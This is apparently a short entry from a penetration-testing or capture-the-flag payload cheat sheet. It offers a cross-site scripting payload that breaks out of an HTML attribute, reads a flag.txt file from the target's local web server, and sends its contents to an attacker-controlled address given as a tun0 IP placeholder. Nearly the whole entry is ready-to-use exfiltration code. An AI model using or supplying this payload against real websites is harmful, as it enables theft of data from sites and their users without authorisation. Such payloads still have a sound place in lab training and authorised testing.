Interesting Payloads

This code will grab a txt file from the host system web directory and post it to a local web server under your control.

'"> fetch('http://127.0.0.1:8080/flag.txt') .then(response => response.text()) .then(data => { fetch('http://<YOUR-IP-ADDRESS-tun0>:8000/?flag=' + encodeURIComponent(data)); }); </script

PreviousXSS PolyglotNextWeb Redirects

Last updated